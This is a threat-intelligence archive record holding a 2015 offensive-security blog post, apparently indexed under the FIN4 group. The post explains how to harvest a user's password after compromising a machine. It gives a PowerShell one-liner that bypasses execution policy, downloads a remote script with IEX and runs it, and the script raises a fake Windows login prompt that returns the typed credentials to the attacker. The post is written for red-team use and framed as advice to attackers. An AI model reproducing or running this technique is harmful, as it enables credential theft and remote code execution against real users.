{
	"id": "f459c784-8462-4f54-b167-868f62541ba5",
	"created_at": "2026-04-06T00:19:54.037353Z",
	"updated_at": "2026-04-10T13:11:41.075487Z",
	"deleted_at": null,
	"sha1_hash": "5b8948db758228d32dd8cf6475103eb4c5919441",
	"title": "Phishing for Credentials: If you want it, just ask!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 493248,
	"plain_text": "Phishing for Credentials: If you want it, just ask!\r\nPublished: 2015-01-21 · Archived: 2026-04-05 12:47:34 UTC\r\n**Update**\r\nI have updated the script so it checks for credential validation. The prompt will not close until the user enters the\r\ncorrect password. Once validated, it will display the password for you.\r\nToday, I was playing with Invoke-Mimikatz, created by @JosephBialek, which takes Mimikatz\r\n(created by @gentilkiwi) and loads it into memory. I absolutely LOVE this tool, but I get sad when I don’t have\r\nadmin rights on the box and I don’t want to touch disk. If all you are after are the current user’s credentials (for\r\nemail, VPN, network access), you can use this method. I initially thought of this after reading a report by FireEye\r\nregarding FIN4’s method of invoking an Outlook login prompt when the macro is run. You can find this report here.\r\nYou can find my code here:\r\nhttps://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1\r\nBasically, you compromise a machine using a malicious VBA macro or some sort of other vector. Once you have\r\naccess to this machine, drop to a shell by typing “Shell” at the meterpreter prompt.\r\nFrom there, you can run the following command: powershell.exe -ep bypass -c IEX ((New-Object\r\nNet.WebClient).DownloadString(‘URL_To_Invoke-LoginPrompt’)); Invoke-LoginPrompt\r\n*When you add the URL to the Invoke-LoginPrompt script, make sure you use the “Raw” version on GitHub or\r\nhost your own*\r\nWhen this runs, the user will get a prompt that is pre-populated with their domain and username.\r\nWhen the user enters their password, it will return it to you with the domain and the user’s username:\r\nFrom there, you can now log in to whatever resources you want as that user.\r\nThanks,\r\nMatt N. (@enigma0x3)\r\nSource: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/"
	],
	"report_names": [
		"phishing-for-credentials-if-you-want-it-just-ask"
	],
	"threat_actors": [
		{
			"id": "2799bc47-e502-49f0-a289-87e3cc95ecc6",
			"created_at": "2022-10-25T15:50:23.706367Z",
			"updated_at": "2026-04-10T02:00:05.34551Z",
			"deleted_at": null,
			"main_name": "FIN4",
			"aliases": [
				"FIN4"
			],
			"source_name": "MITRE:FIN4",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5f6ade4c-e2db-46f0-b1b4-529ea52d040b",
			"created_at": "2022-10-25T16:07:23.611546Z",
			"updated_at": "2026-04-10T02:00:04.687074Z",
			"deleted_at": null,
			"main_name": "FIN4",
			"aliases": [
				"FIN4",
				"G0085",
				"Wolf Spider"
			],
			"source_name": "ETDA:FIN4",
			"tools": [
				"UpDocX"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3571da12-0890-45e7-85d3-04fac7070b52",
			"created_at": "2023-01-06T13:46:38.414772Z",
			"updated_at": "2026-04-10T02:00:02.964831Z",
			"deleted_at": null,
			"main_name": "WOLF SPIDER",
			"aliases": [
				"FIN4",
				"G0085"
			],
			"source_name": "MISPGALAXY:WOLF SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434794,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.pdf",
		"text": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.txt",
		"img": "https://archive.orkl.eu/5b8948db758228d32dd8cf6475103eb4c5919441.jpg"
	}
}